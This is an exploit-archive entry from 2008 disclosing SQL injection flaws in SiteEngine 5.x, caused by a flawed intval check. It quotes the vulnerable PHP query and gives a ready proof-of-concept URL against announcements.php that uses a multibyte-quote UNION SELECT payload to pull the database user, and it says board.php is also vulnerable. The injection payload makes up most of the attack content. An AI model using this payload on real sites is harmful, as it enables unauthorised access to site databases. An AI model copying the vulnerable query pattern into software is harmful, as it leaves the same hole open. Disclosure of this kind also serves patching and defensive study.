[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SiteEngine 5.x Multiple Remote Vulnerabilities
# Published : 2008-10-23
# Author : xy7
# Previous Title : WebSVN <= 2.0 (XSS/FH/CE) Multiple Remote Vulnerabilities
# Next Title : Joomla Component Daily Message 1.0.3 (id) SQL Injection Vuln


SiteEngine 5.x Multiple Remote Vulnerabilities
Due to incorrect use of intval function, leading to the logic of inspection parameters can be bypassed, resulting in SQL injection vulnerability.

-=0x01=- SQL injection Vulnerability
vul code like this:
if ( intval( $id ) )
{
    require_once( $site_engine_root."lib/rss.php" );
$sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'";

POC:
http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/*
This vulnerability exist in board.php tooa